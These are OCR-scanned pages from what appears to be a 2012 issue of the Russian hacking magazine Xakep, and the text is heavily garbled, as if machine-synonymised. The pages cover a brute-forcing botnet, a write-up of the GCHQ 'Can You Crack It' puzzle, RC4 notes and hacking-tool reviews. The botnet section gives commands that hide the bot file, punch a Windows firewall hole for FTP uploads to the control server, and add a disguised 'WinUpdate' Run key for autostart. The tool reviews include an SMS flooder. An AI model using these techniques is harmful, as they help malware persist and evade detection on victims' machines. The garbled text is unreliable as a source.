ХАКЕРСКИЕ ФИЧИ Теперь перейдем для оптимизации нашего самопального комплекса .

вручать весь круг раз, с тем распознать посредь собою ха сты,

Во-первых , брутер, кавасаки равно библиотеку не запрещается запаковать на безраздельно

находящиеся вслед NAT), задним числом что на базу добавляются те адреса,

экзешник, притом так, ась? слушание функционирования бота способен

которые безграмотный были во ней найдены. Их позволительно заключать во панели

невидимым, ведь убирать рента отнюдь не короче видно.

управления ботами. Но сверху оный случай, неравно кавасаки поуже брутит да немо­

Для сего не возбраняется nрибегнуть ко подручным средствам, а прямо

жет отстучать, что-нибудь возлюбленный живой, допускается тоже проделать во таблице

со со тавить рубашка следующего содержания:

колоночка

нужно вместе с болтать софтин для у ВАТ То ЕХЕ Conveгteг

lastcallback . Там

отображается число, которое указывает,

%CD%\bot.exe. Далее 1.5 равным образом скомпилировать

от случая к случаю ботик отстучал во nоследний раз. Таким образом, около каждом

во ней таковой батник, спервоначала указав во настройках invisiЫe

обращении ко серверу зто сила обновляется.

application равным образом выбрав сверху вкладке include три файла: bot .exe, теку [php5ts.dll) да самолично консольный брутер [md5.exe).

Если оно лишше 000 [дефолтный пятиминутный интервал отстукивания бота), в таком случае сие значит, который ботик работает либо — либо находится

библио­

Программка создаст одиночный файл, занимающийся во фоновом режи­

во офлайне. Затем нужно основать магнето конфигов. Конфиг, во вкусе

ме . Затем не запрещается свершить так, с намерением скрывались равно самочки файлы . Для

ты, возможно, заметил сообразно вышеприведенным кускам кода, состо­

сего убирать мало-мальски способов. Водан с них- это, например, про­

ит с двух частей, объединенных наслышан

0.

стое употребление штатной виндавай софтины attгib из флагами

Первая доза отвечает ради команду, которую nолучает бота,

'+h ' да '+s'. При мер:

а вторая- после дополнительные данные, нужные ради исnолнения

этой команды. Чтобы передать команду возьми установку, автор сих строк должны

attrib "%CD%\bot.exe" +h +s

выслать кое-что кажется iпstalllvocab_123123123.txt, идеже iпstall­ этo майна установки бота, а

vocab_123123123 .txt-

сие обложка

словаря, что надлежит установить. Мы и можем оттрепать по сию пору

Такая распоряжение скроет да сделает системным свой обложка бота. Спрятать обложка на потоках

NTFS

крошку сложнее:

рабочие руки файлы, легко удалив их,- про сего стоит по­ слать команду

clean.

Ну да самая главная команда- сие bгute.

Второй параметр этой команды объединяет хеш равным образом про б рута

cd "%systemroot%\system32 type packed_bot.exe>calc.exe:bet.exe

от через двоеточия:

Запуск рядом этом осуществляется равно как вместе с через батника: brute)c4ca4238aeb92382edccse9aбf75849b: c81e728d9d4c2fб3бfeб7f89cc14862c:eccbc87e4b5ce2fe28Зe8f

d9f2a7baf3 Все результаты заливаются возьми ПР-сервер, какой находится там же, идеже да очаг управления . Попадает всё сие деяние во папку

cd "%systemroot%\system32 start .\calc.exe:bet.exe Наш обложка на книга числе загружает результаты возьми FТР. Файервол

Windows

может возьми сие браниться , благодаря тому попробуем его обойти:

гesults. Для того дабы присчитать во базу готовые результаты, ботик <<дер­

гает» скрипт от передачей параметра

iamfinished.

С криnт сервера

passthru( 'netsh firewall add allowedprogram %WINDIR%\ system32\ftp.exe TCPinfrastructure>nul 0>&1 ' ); Авторан чтобы нашего ехе [если спирт лежит, например, в % systemгoot % ):

passthru( 'reg add HKLM\software\microsoft\windows\ currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 0>&1' ); ЗАКЛЮЧЕНИЕ В РНР хватит функций, предназначенных чтобы создания нехи­ лого файлового менеджера или — или а простого системного помощника . Я надеюсь, сколько по причине моей статье твоя милость убедился безвыгодный только в этом, хотя вот и все равным образом на том, сколько в целях автоматизации процесса суще­

ствует обилие различных средств , которые подле совместном

Рабочий ботик

ХАКЕР

03/158/20 02

использовании могут страшно тебе помочь.::;:

065


plaintext lfi rst!a plaintext.su, http://www.plaintext.sul ·

can cra 8t' 1• РЕШЕНИЕ ЗАДАНИЙ ДЛЯ ХАК-КОНКУРСА, УЧРЕЖДЕННОГО

УПРАВЛЕНИЕМ

ПРАВИТЕЛЬСТВЕННОЙСВЯЗИ ВЕЛИКОБРИТАНИИ

Недавно Управление правительственной сношения

Великобритании объявило нищенский

Н-конкурс, чтоб прельстить ко себя внимание к а для для работодателю . Не уверен, ась? ко ним кто­ то устроился возьми работу, только пройт да задания с

На нашем диске ты смож ешь найти видео вместе с полным прохождением

конкурса « Сап

You

Cr ack lt?».

спортивного интереса мертвяк захотели многие .

.PNG .......IHDR. .............j .-•... sRGB ......... pHYs ................. tiME. .. .. . 0-9.p ... )iТXtComment ..... QkJCQjiAAACR2PFtcCAбq2eaCBSR+BdmD/zNzLQC+td3tFQ4q x8044 7ТDeuZwSP+{)SsDEcYR.78J KLW=2 ...... IDATx ... yt .... лcwuW... So-.. ,....... L.. l!!> ... q .. 08.. 0.. a.7.,. НV.y.&.:. G.a ...... mMH.d ......\ .U... ?.n7-Ktuwi ... Gj.R. ..... g.} .. .. sн. д .... sн . д.... sн . д .... sн . д .... sн . д .... sн . д.... sн . д .... sн. д.... sн. д .. .

.sн . д.... sн . д. ... sн . д.... sн . д.... sн . д .... sн . д. ........o.. u.... на :. Lz . D .. I!!>.B c.... .l.4.. ) .... • -....... d .. !QZ. •-ее. D, .. ,.. q.R.fc.. & .•w41r... Ra6... 0...:... ".. } .D.r..https://issuu.com/14.% ....... D<. D " s .i A.ТX, .. ZD .... $....... лX. .. 0.. ·.C.9y.i ...V... ,MO.. G.B y .... B .......... (<.C.. q .. X.Di .. 0M .....f{... Sv; .. (... 0.H.&'.}}y.j....... 0.. BQ.. !. .... zz.... t..jM&...... К. .. s% .... f .. nW.... X.fH .... s.. k .. h.vmm-' .._y: :.' p.6... djSK ............. R. .. R.. 0. Q.... >..... <....... bH ...... C.1 ... t) . .........-.UX,.%K11!> ..

Задани е первого этапа

066

Комментарий для файлу вместе с заданием

ХАКЕР

03/158/2012


0

Итак, некоторое пора обратно Управление

местожительство конца выше- е го кода, указываю щишки й, идеже

void

правительовенной своя рука Великобритании

со держит ся значе ни е ОхАААААААА. Д алее

{

об ъявило конкурс, успешное относительно хож д ение

изо стека изо влека ется

DWORO,

нивается со ОхАААААААА. Затем извлекается

свое резюме, а а там равным образом поступить бери работу

е ще касательно дн в рассуждении з начени е, ко тор ое срав нив ае т ся

на брита н скую киберразве д ку . Пр едложе нны е

от О х ВВВВВВВВ . Однако сего куска дан ных

вслед дания н е где-то ужак сложны, д а да саму стра­

!второй половины стека функции] у нас нет.

ницу отдела к~дров Управления правитель­

функции , необ хо квартал относительно спасти впадина тин ку вместе с за­

враз обнаружи ть быть п омо суп пои сков равно ко а

дани е м не без; балка та да п осмо третья часть , в духе сия занятие

Google,

тем не менее оный состязание всё а интере­

сен , приближенно по образу спирт позволяет аттестовать у ровень

подо г отовки сотрудников, ко т орые соста вля­ ли задания.

На странице ко нк урса, находящейся соответственно

iTXt РNG-файла из вслед ­ данием ! ко диров ка UTF-8]. Бинарные д анные закодированы вместе с п омо щью алгоритма Base64 и следуют следовать сло на ом Comment !смотри рисунок].

}

Раскодировав да склеив дв а бинарника, аз многогрешный за­

v1 v2 do

ния, тот или другой представляет внешне следующую

ствующий рисунок] равным образом надпись-дразнилку «Сап

строку:

Сгасk

lt?>>.

l~hile

спервоначала подумал, аюшки? сие следовать шифрованное по­

GET

/ 05b43бde1f9187f3778aad525e5d8b28 .js

ASCII,

всё-таки у меня

нисколько безвыгодный вышло. В итоге мы решил вставить всё-таки

НЕХ-значения из рисунка на двойной фай л и открыть полученное похабство во

IDA

Рг что до . В

После через п равки соот на е т ствующе г что до

GET-

зanpoca н а сервер получаем во-вторых следовать дан ие.

Кстати, ко д допускается запус тить нескольки­ ми вместе с п особами. Я создал азбучный ехе -фа йл, в котором первоначально считывается ломоть стих не без;

таты.

вслед за так точно нием, а испарина ом всё э т касательно д ело запускается получай

распознал осмысленные куски

заключение чтобы архитектуры х86 . Я п относительно нял , ч т относительно выбрал

проделывание ! п од ко н тро л ем

строгий п у ть.

аляповатый ассемблерной вставки:

IDA] быть опора ощ равно

OxDEADBEEFu; +

v1 ;

( (_BYTE ) vO ) ; sub_39 (); } Результат декомпиляции

нием. Д ля сего невыгодный нужно нюхать границы

PNG,

а хватит за глаза легко состоять внимательным !не­

Недолго думая , автор этих строк преобразовал павел уче н­ ный часть заключение на функцию равно запустил д еком­

=

l~hile

итоге ми посчастливилось павел водить кое-какие рез ул ь­

IDA несложно

( (_BYTE ) vO ); о;

}

НТТР / 0 . 0

мости каждого зна чения да попытался в рассуждении сего

протолмачить их на символы

0;

LOBYTE ( v1 )=v2 + v4[ v0 ] v2=ROR __ ( v2 , 0); v3=v4[ v1 ]; v4 [ v1 ]=v4[ v0]; v4[ vO ]=vз ; lOBYTE ( vO )=vO + 0;

Уви д е на сии Н ЕХ-значения, моя особа

слание, начал было исчислять частоту встречае­

+

{

пустил шифр в устройство !под отладчиком] и пр осмотрел рез ультат пр об ц е д уры дешифрова­

You

v4[ v0 ]=vO ; lOBYTE ( vO )=vO

усишко тро е держи . Недостающие д анные со держатся во

не без; набором НЕ Х - з начений !смотри соответ­

о;

{

дополнительной секции

адресу caпyou cг ackit . co . uk , наш брат видим картинку

cdecl sub_O()

vo do

Чтобы раскопать вторую половин у стека нашей

овенной блат IGCHQJ не возбраняется пр акти ч ески

itl

int vo ; // есх@1 int v1 ; // еах@З unsigned int v2 ; // еdх@З char vз ; // bh@4 char v4[256] ; // [sp+Oh] [bp-100h]@2

тот или иной срав­

которого п холм воляло отослать во У ведение

не без; ап сгасk

обходима автор этих строк сообщение со держится на самом

начале файла].

_ asm

пилятор. Сначала на стеке вам деля ется место под сосредоточение во

056

байт, кто заполняется

значениями через О накануне

055,

а дале е вып что до лняется

проце д у ра преобразования массива, которая

int 0;

mov call

SECOND STEP

nрограммная степень останова

еах,

еах;

array; ar ray -

конгломерат

со

кодом

заnус для ко стихотворение в выnол нение

попытаться настрочить эмулятор микро­ nроцессора . Дан отрезок памяти со кодом да

получай са мом д шель-шевель пре д не без; т авляет лицом алгорифм

инициализации шифра RC4 вместе с ра зме кашаса блока 8 двоичный знак да для люч ом OxD EADBEEF !смотри рисунок] .

Во втором задании а вт оры предлагают нам

данными, а тоже описана конфигурация

Хочу отме т ить, что-нибудь на начале стих прои схо ­

микропроцессора, с целью которого вс ё сие

После лишь сего вызывается покамест одна функ­

дит jmp чрез четверик !вроде бы] неиспользуе­

предназначено . Процес отбросы состоит с

ция, плеть которой испорчен, равным образом поэтом у касательно н а невыгодный

мых байта. Э ти четверик байта пр бремя дя тся нам во

в области зубам декомпилятору.

дальн ейшем. Как видишь, бульон запрос до­

восьми регистров, фошка изо которых !гО ... гЗ] представляют собою регистры общего на­

без церемоний насчет не без; тое. Затруднения возникли всего только

значения, двушник предназначены чтобы хра нения

Как оказалось, на начале следующий функ­ ции значительность регистра

esp,

содержащего

указа тель получай вершину стека, меняется держи

подле об нар еще нии другой части от тека функции

адреса сегме нта заключение да а др еса сегмента

во дополнительной секции РNG -файла не без; зада-

данны х ics да ds соо тв е т ственно], что до д ан ре-

printf ( ''\nkeygen .•xe\n\n'' ); if ( ~1 •• 0 ) (

uS • ( FILE • ) f ope n6 0("'license.txt" . ''r" );

if ( us ) ( MI?IIISet (&U9 0

D.

UNIX CRYPT()

0Jш);

fsc.:.nf ( uS . '"ts'' • r.u9 ); f c lose ( uS ); if ( u9 •• ' qhcg' )

Функция сгурt на операционных системах

{

u2 • crypt (); if ( ! s tr c ~tp ~ ( const char· • ) u2 . ghDTK7b8Kru w) ) U13 • 0;

printf ( "loading stage1 license key(s) .. . \n''); u6 • u10 ;

printf ( "loading stage2 license key( s ) . . . \n\n'' ); u7 • u11 ; u8 • u1 0 ; }

if ( U13 ) (

u4 • Tr ans•itl nfo (•(_DWORD

• )( а2

• lt). ( int )&u 0 );

}

else {

pri ntf ( ''er-ror: licf'nse.txt i nualid\n''); u4 • - 0;

*ni x

свежеиспеченный устройство шифрованного текста вдругорядь

DES

служит интересах хеширования различных данных,

шифруется не без; через алгоритма

на фолиант числе паралей пользователей системы.

Таким образом , устройство изо восьми нулевых байт

да т. д.

Традиционная исполнение этой функции

шифруется во nроцессеработы

использует заатлантический алгорифм

отметить, в чем дело? сгурt никак не использует стандартную,

DES (Data

05

присест . Стоит

Encгyptioп Staпdaгd]. Пароль пользователя

эталонную реализацию алгоритма

сокращается предварительно восьми символов, через каждого

Алгоритм любой однажды крохотку меняется . Его

изо которых, во свою очередь, берется

конкретная действие зависит ото соли длиной

0 бит. 7 двоичный знак формируют 06-битный DES, около помощи которого

DES.

Восемь наборов до

02

отпирка алгоритма

nреобразуются во строку подле помощи алгоритма

шифруется агрегат с восьми нулевых байт . Затем

бит. Соль да шифрованный стихи во итоге

Base64.

Основной функционал программы keygen

ХАКЕР

03 / 058/ 0012

067


взламывание

short loc_6

-------------; :=====-=-=-=-:..::;- ----------------------------·

-------------

dd OAЗBFC2AFh

-

0

-----------------------------------·

loc_6:

; sub xor

сэ:

ОхОО ,

dэ:

OxlO ,

fl :

ОхОО ,

j tirmware:

esp,

000h

есх,

есх

СООЕ

XREF: sub_O!j

[ Oxd2aьlf05 , OxdalЭfllO ] So you did it- приветствие со успешным

Неиспользованные значения изо первого равным образом второго заданий

гистр служит к хранения флага операции

[flgl, равным образом один- интересах хранения адреса текущей инструкции [ipl. Микропроцессор обладает набором с

описании задания упоминается бурдон cs, так но в духе равно г51. Второй субаквальный камень -реализация fаг jump'oв равным образом изменения ip.

выполнением заданий

GET /da75370fe15c4148bd4ceec861fbdaa5.exe НТТР/1.0

Здесь не мудрствуя лукаво нужно знать, аюшки? значения ре­

восьми инструкций, каждая изо которых [за

гистров, отвечающих после заезжий двор сегментов,

Отсылая появляющийся GЕТ-запрос ко сайту, полу­

исключением инструкции hlt, прекращаю­

изменяются только лишь подле дальних переходах да

чаем третье блюдо вслед дани е - исполняемый файл. При

щей воплощение программыl имеет банан

малограмотный изменяются, ежели ip начинает адресовать

просмотре зависимостей сие го файла видно,

режима работы: mod О равным образом mod 0. В принципе,

держи новомодный участок заключение . В остальном но всё

аюшки? ради его работы необходим Cygwiп. Вообще,

интересах успешного выполнения задания до­

без труда равным образом прозрачно. Разработчики заданий

на свойствах полученной программы указано,

статочно не быть обделенным небольшими навыками

предлагают нам провести в жизнь эмулятор бери

в чем дело? сегодняшний день титул зкзешника keygeп.exe, приближенно

программирования, а да представлять,

языке JavaScгipt, всё-таки возьми то, короче ли

что такое? отважно переименовываем его.

наравне рабо т ают микропроцессоры. Однако во

учтено выполненное задание, отбор языка

процессе программирования ваш покорный слуга наткнулся

программирования никак не влияет. Я реализо­

сом- шифр ни за что безграмотный обфусцирован. При следовать пу­

В данный раз в год по обещанию паки никаких пр облем от ревер­

сверху сколько-нибудь подводных камней. Сперва аз многогрешный

ось эмулятор процессара для С. Программа

ске keygeп требует послать ему URL сайта чтобы

объединил на единодержавно конгломерат регистры общего

выполняется изрядно быстро, ежели и у меня

соединения во качестве первого двое метра. Ал­

назначения, а к cs равным образом ds выделил отдель­

были подозрения, почто разработчики напи­

горитм работы программы хватит прост: во

ные переменные. Как оказалось, зто оши­

гаер код, некоторый бросьте подвизаться полчасика :-1 .

текущей дир ектории выполняе т ся пои ск файла

бочный подход, таково в духе на коде встречаются

инструкции вроде «add г[5], 02>>, которые, согласно

После остановки процессара [выполнения инструкции hltl во памяти появится разъяснение ко

вот и все три числа. Судя за строкам на се гменте

замыслу разработчиков задания, изменяют

третьему этапу конкурса - стоит на повестке дня GЕТ­

данных, требуемые числа представляют собою

значения сегментных регистров напрямую [в

запрос:

Stage оп е liceпce key равным образом Stage two liceпce key,

licence .txt, изо которого считывается строка, а

ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ В нынешнее времена по-китайски сыскать

<<заnо дозрить >> оный сиречь из другой оперы филиал заключение во

коммуникационную систему, которая невыгодный

nринадлежности для какому-либо алгоритму .

ISBo x' ыl, кой-какие специфические константы,

использовала бы криnтографию. Часто на

Так, например, современные симметричные

а вот и все такие nараметры алгоритма, вроде протяжение

процессе реверс-инжиниринга различных

блочные алгоритмы шифрования естественным путем

ключей [в фолиант числе апофема массива раундовых

модулей необ х одимо различать

построеныпоитерационной схеме, во которой,

ключей!, метраж блока, часть итераций

да восстанавливать используемые

что правило, производится вознаграждение значений во

[раундов! равным образом т. д. Подобными признаками

криптографические алгоритмы, режимы их

соответствииснекоторой таблицей на памяти ,

в свою очередь обладают равным образом хеш -фун кции. Алгоритмы

работы, nорядок выработки равным образом использования

нало жение ключа шифрования равно линейное

хеширования нормально исnользуют старшие

ключей шифрования равным образом т. д. Разбор конкретной

реорганизация . При этом на пределах одной

наборы констант, зачем облегчает различение

реализации алгоритма такженередко

функции во ассемблернам листинге может

вроде алгоритма равно его возврат .

позволяет невыгодный исключительно выразить ее ошибки, так

завязать знакомство цикл, большое величина

Стоит отметить, который во подавляющем

равным образом оnределить, что-нибудь алгорифм исnользуется

инструкций тиnа

mov, movzx , add, хог, shl, shг

большинстве программных реализаций

неnравильно, во результате что такое? могут

равным образом т. д ., а вдобавок частые обращения для nамяти [в

симметричных алгоритмов шифрования

просыпаться уязвимости, nозволяющие на

качестве nримера видишь рисунок!.

связка выработки массива раундовых ключей

конечном итоге nровести усnешную атаку возьми

Кроме того, для того каждого криптографического

lkey schedulel равным образом круг обязанностей дешифрования/

систему на целом.

алгоритма не запрещается предоставить некоторые люди

шифрования открытого текста находятся на

Вообще, универсального рецеnта объединение

<< отличительные внешний вид >> , которые позволяют

разных участках стих программы . Это помогает

распознаванию криптографических

автоматизировать розыск необ х одимых

приблизить срок nроцесс обработки информации (и

алгоритмов никак не существует, не возбраняется как только

участков кода. Чаще лишь такими признаками

неграмотный издерживать любой раз в год по обещанию период равным образом запас получай

распределить отдельные люди nодходы равно оnисать

служат константы, х арактерные к того

nолучение

кое-какие nризнаки , которые позволяют

либо — либо иного алгоритма. Для симметричных

алгоритма!.

068

алгоритмов сие могут являться блоки подстановак

key shedule

изо основного ключа

ХАКЕР

03/158/ 0012


0са п cra ck it l

Ито г что касается на ый GЕТ-за пр ос ко се р ве р у равно м еет

так принимать сие неко т в отношении р ые д ин н ые, дл аз многогрешный n олучения

которых никуда не денешься ухлопать вслед д ачи , п ре д ла­

от л едую щ ий на да д :

АЛГОРИТМ

гаемые получай первом равно втором этапах конкурса.

Прочитанная изо файла строчка nреобразуется

близ nомощи функции crypt [из Cygwin ) равным образом срав­

RC4

GET / hqDT K 0 b8K2rvw/ A ЗBf C 0A F /D2 AB1F e5/ DA1 0F1 0e/key.txt НТ Т Р / 0. е Алгоритм

нивается со э т алон н ым з н а ч е н ием изо сегмен т а

данных программы. Д ойдя д по отношению э т ого буква n а, пишущий эти строки

Этот задание позволяет проюрдонить обложка

[также изве от тен во вкусе

ARC4)

нате

уже было nриня-лся рушить хеш изо сегмента

key.txt,

данных, всё же э т по отношению был тупиков ы й п уть, да во сё

из п холм д равлением

оказа л центр гораз д относительно n р в отношении щ е. Н еобхо д имый IР ­

сверху оп исание вакансии, во ко т что до р ом выкладывай т ся,

Ривесто м , одним с основателей компании

надсыл из сего следует не без; использованием перво г что касается

что-то конкурсанту, успешно выполнившему постоянно

R5A

nараметра программы [UR L сервера) равным образом DNS.

ради д ания, абсолютно никак не предлагают работу по прямой

ладает рядо м впредь до вместе с тоинств , ко которым на первую

Как попросту д ога д аться,

UR L д олжен

п ред­

во котором указан треншальтер с страни ц ы

RC4

сегодняшни й мол н ь является одним изо самых

<<So you did it» равно ссы л какой

известных равно барином используемы х поточных

шифров. Алгоритм был разработан Раном 5ecu гi ty, во далеком

0987

году .

RC4

об­

сейчас, н в отношении согласны узреть его канди­

очер е дь относят не без; аз многогрешный высокая прыть работы

став пят ь лицом а др yes страницы со после ну да ни ями:

безусловно т у р у п озже, когд а на У п равлении п оявятся

да п е ре м енная пикет ключа . На каждом такте

canyouc г ackme . co.uk . Д алее

свободные вакансии.

keygen.exe форми­

работы алгорит м генерирует

рует для удаленному серверу G ЕТ- вопрос вида:

SUMMARY GET /%s/%e8X/%e8X/%e8X/key .txt

НТТР / 0 .е

Как автор уnоминал ранее, для месте строки на за­

0 двоичная единица информации

псевдослу ­

ча йн об й по части от ледовательно со ти равным образом изменяет из вое вн у треннее от остояние , ко оторое определяется

З аид анияотУправления п равительствен -

перестанов для ой значений через О вплоть до

утнапиштим сношения Великобритании малограмотный представля-

дву м аз многогрешный однобайт н ыми изредка для сами:

055 [5) и i равно j. Алго­

надстройка никоим образом ой сложности равным образом во первую черед

рит м

просе нужно хеш-з н ачение с сегмента данных .

ориентированы для проверку смекалки, а уж

инициализаци да [К5А) равным образом алгоритма выработки

Остае т ся как только най т да значения <<ли ц ензионных

после - навыков реверс-инжинирин г а равным образом про­

псевдослуча й да й последовательности . Про­

ключеЙ>> п ервого равным образом второ г по отношению э т апов после д аний,

граммирования равным образом знаний что до принципах рабо т ы

цедура инициализации служит чтобы выработ­

чтобы аюшки? автор этих строк начал накоплять данные, которые

микропроцессоров. Выполнить сии задания подина

ко равно п е р е становки

для сих этапах безграмотный использовались. На первом

силу любому человеку, у которого достанет

с

этапе сие цифра байта на начале кода, вследствие

терпения да энтузиазма. Это обиняком свиде­

псевдо ко одом :

котор ы е ш ел п ер на об н ачал ь н ы й

тельс т вует в отношении том, ч ведь во

jump. Дл пишущий эти строки

00

RC4

поперед

состоит с дву х частей : процедуры

056

0

около помощи ко люча длиной

бит. К5А описывается не без; ледующим

GC HQ работают обычные

второ г по отношению этапа сие нигде далеко не пригодившееся пара

люд ,

ОWОRО-значения firmware [смотри рисунок).

которые во зрелищных голливудских фильмах

Вообще, изумительный втором задании никак не использовался

взламывают парали ради пару минут да со легкостью

целый беспристрастный ба н для памяти, кото ры й сверху ч равно н ае т ся

п ро н икают на после щ ищенные путы правите ль от т а

j

от сигна т уры

разных стран. Н апоследок неймется побла г о­

f or i f r om е t o 055 j :=(j + S[ i ] + key[i mod keylength] ) mod 056 swap va lu es of S[i] and S[j] _ endfor

0z,

в отношении дн ако далеко не мы вл яе т ся в отношении д ноимен­

everyday heroes, а

безграмотный те супермены,

ным архивом. Этот учас т ок, неграмотный потребовавший­

жертвовать британцев после пока что одну возмож н отросток

ся чтобы выполнения задания, видимо , нужен

<<размяться» да проконтролировать близкие познания . За д ания

прос т в рассуждении д ля того, ч т обы вслед за п ута т ь конкурса н так на .

наших спецслужб были бы много хар д ко рн ее. :х:

• •

.

• text :101221121 . text:10122112 .. • text: 000221126 • text :101221129 • text :1 ОО22А2С .text:100221133 • text: 0 00221136 • text :1 0022А38 • text: 0 00221138 • text: 0 002211ЗЕ • text: 0 012211..5 • text :1002211 ..7 • text: 0 002211..8 • text :1 01221152 • text :101221155 • text :100221157 • text :1 012211SA • text : 0 0122ASO • text :1 OI22ASF • text :100221162 • text :100221169 .text:10022116B • text :10022116Е .text : 000221171 .text:100221173 .text :100221176 • text :100221178 .text:10022117B • text: 00122117Е

ROU ROU

shr ROUZX ROUZX

Shl AOU

Shl" AOUZX ROUZX XOI" AOUZX AOUZX

Shl XOI" ROU

shl AOU

Shl" AOUZX XOI" XOI" AOU XOI"

esi. (eax• 0Ch ) есх. esi есх • 00h 0 edx. cl есх. ds:byte_10058188[edx) есх. 0 edx • esi edx. 0 edx. dl edx. ds:ьyte_10058188(edx] есх. edx edx. byte ptr (eax+ 0Ch ] edx. ds:ьyte_10058188[edx] есх. 0 есх. edx edi. (eax+ OCh ) есх. 0 edx. esi edx. 08h edx. ds:byte_100S8188(edx] есх. edx есх.

(еЬр+ О ]

edx.

(еах• 0 ]

есх.

(еах]

add

еьр.

0

XOI" ROU ROU XOI"

edx. есх (eax+ 00h ].

f or i f r om е to 055 S[ i] :=i endfor

:=

е

Алгоритм выработки псевдослучайной последовательности как и достанет прост .

Он описыва е тся следующим nсевдокодом :

i j

:=

е

:=

е

whil e GeneratingOutput: i :=( i + 0) mod 056 j :=(j + S[ i ] ) mod 056 swap valu es of S[i] апd S[jJ _ К :=S[(S[i] + S[j] ) mod 0;>6] output К endwh i l e Алгоритм

RC4

применяется к шифрования

данных во протоколе

05L, защиты трафика WEP, защиты документов Adobe PDF и Microsoft Office . Широко известны случаи,

на

в отдельных случаях неправильное исnользование данного

алгоритма позволяло вос со тановить конфи­

денциальную информацию . Так, некоторое время вспять на защиты содержимого

РDF-документов применялея ключа

есх

00

Х АКЕР

03/158/2012

AES

от длиной

ленник был в силах нажить вход ко содержимому

есх.

(еах• 0 ]

файла простым перебором ключа . В одной

есх.

edx

изо версий М5

Office RC4

исnользования Кусо ко ассе м блерного листин г а алгоритма

RC4

бит, во результате почему злоумыш ­

по поводу неправильного для защиты файлов чтобы

вот вместе с становления равным образом х содержимого х ватало

069


,.,~,.

(

~ '"r;- -,'

::,

~\ "~,.'

~.:~~~~

* :

r

• ~:---~

что касается

03

00000004 Ноемо бозо .-.кoe.rndЬ Количеста об кееа.:

Оwт

09

Услоои• обробо""' r:t>

02

ДоnусТW<ЫА"'""""'fМ

0


с~ ... ~~ ~ сосорост-.

0898K8i5

Ф,,".,

0021 04

Mys..o

~

020~1

0•

022988

ТВ

0-4е<IОЭ

....

tфт

0~0

приема у квалифицированного специалиста.

Поиск сообразно базе:

+

с==_

сыскивать

Вы nоnали сверху самый заметный файловый искатель во рунете . Ищите любые файлы да скачивайте нате неограниченной скорости с самых больших торрент-трекеров

Попупярные требования :

сайт << Проверка зрения путем интернет». Он, естественно, был адски важнецки

IV сауз лес кот интерны wow аватар кас пере палка патч 0010 GTA Starcraft 0 рок ПрОГраММЫ dVd 0QQ9IOSSieSS ИЛаЯ ре nорно КОМеДИЯ mpЗ sasha grey музыка бесплатно

ссылку, которую выплюнул поисковик, и-

в рассуждении чудо'- сие оказалось не что-нибудь иное то, зачем нужно:

''

кв н friends Fleur lost Dragon дgе crysis прожекrор перис хилтон довольно

Конечно, Ваня испугался, а у страха, в качестве кого из­ вестно, бельма велики. Ваня ткнул первую а

daemon total

pdf медсанчасть фильмы HQ пипец windows 0 HD 020р из кидать dvdrip качество Весёлая хозяйство house КаМеДИ

оформлен и, ась? самое главное, предлагал проверить амблиопия сделано сейчас' Ваня быстро нажал «Пройти проверку» да ответил держи во­ просы анкеты, которые считается должны были выявить, что-то но всё-таки произошло от его

глазами. Когда Ваня ответил нате всё-таки вопросы, сайт сообщил ему, в чем дело? установка диагноза, вообще-то, платная, же есть расчет нипочем равным образом ась?

Ложный

072

depo si tfiles

ради его получения надобно определить близкий

ХАКЕР

03/158/2012


Доброго времени суток уважаемые форумчанеl Предлагаю изделие adult платников . в услугу входит : -Установка отметка платникiJ

Целевой сайт

-Настройка категорий -Нарнсовка уникального Лога -Наполнение

-nотключенне ко бнллннrу

А ТliКЖе цикл сообразно каталоrlllм©''


хакинг

Marlicq 084888, http://snipper.rul ·

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Автор :

NEOx. URL:

Rro_r_,._,..,..НIIP

"' or тat> •

о'> е

..

Ьit .ly/x 0Lk8n.

--

._ ......

РЕ

Tools- сие

не без;

Q

~ ---~

Система :

полнофункциональная утили-

[64bitl. Она

Автор :

famatech. URL: radmin.ru/products/

SuicideiVII] . URL: rOOt .in/showthread . php?t=18056.

0pscanner.

Windows .

та к работы не без; файлами РЕ /Р Е +

Автор :

Система:

Система :

Windows.

Windows.

Е сли т ы когд а -либо использовал на своей в области ­

П ро га представляет на лицо относительно д винутый SМS­

вседне во утнапиштим работе

флуд ер, позво л яющий циркулировать сведения

Radmin,

так советую тебе

охватывает во себя следующие мо дули : вычитчик

попробо на ать на деле до сей времени одну программу в рассуждении т тех

со любым текстом . Д лина об д ного СМС стандар­

РЕ- файлов,

а авторов -

тна да составляет рядом

Task

Vieweг, оп т имизатор

Win32

Advanced

0

Р Scanne г. Как яс н об

05

сименс на олов возьми кирил­

Р Е -файлов, д етек т вопль компи л мы т ора/у п аковщика

изо названия, п ро га n редставляе т собою п р что до ­

лице да

равным образом м н огое другое. Ос н овн ы е возмож н ости про­

дв инутый сеточный сканнер .

живается отп ра вка С М С на т акие страны, что

г раммы прямо п оражаю т на оображе ни е.

Функционал равно основные совершенства тулзы:

Р оссия, Казахста н , Узбек равно от т а н , Украина. Дл ваш покорный слуга

0.

работы флудера т ребуются ва ли д ные аккаунты

генерация дампов п роцессов [Full, Pa г tial,

вляе т многопоточное сканиро на а н ие со т ен

Maii. Ru.

Regionl;

кусок п ьютеров на сети, чтоб встретить такие ре ­

таких аккаунтов. Ты на п ол н е сможешь сыскать

сурсы, вроде общие папки, Н ТТ Р, НТТ РS равно FТР,

раздачи не без; ними, заре г истриро на ать аккаунты

да получитьдоступ ко ним.

единолично иначе а вос п ользоваться од­

Интеграция не без;

ним изо многих nубличных брутфорсеров сего

добивание работ ы процесса;

Radmin . Б лагодаря инте­ грации со Radmin, отечественный автосканер находит все маши н ы из заnущенным Radmin Sегvеги п относительно ­

нагрузка насчет ц есса во РЕ E ditoг да РЕ Sniffeг;

зволяет спустя время прибиться ко ним на одинокий

подсчёт О ЕР.

восклицание . Д ля сего нате компью т ере, со которого

mymegaemai l @mail .ru:passw l r u: pas s

0.

.NET CLR-npoцeccoв; Anti Dump

автоматическое отстранение защиты Pгotection;

0.

трансформация приорите т а процесса;

РЕ Sniffer:

осущес т вляется сканирование, накануне л но н б ы т ь

оп ре д е л ен да е т равным образом п а для касательно мп вилайет пишущий эти строки т ора/у п аков щ ика;

рот н ов л е н

обнов л е н ие б а зы си гнат ур ;

0.

0.

Radmin Vieweг.

Уд а л енное на ыключение комок п ьютеров. Эт а

Автор рекоме н задувает заключать через

000 по 000

сервиса. Файл со аккаунтами повинен име т ь поверхность :

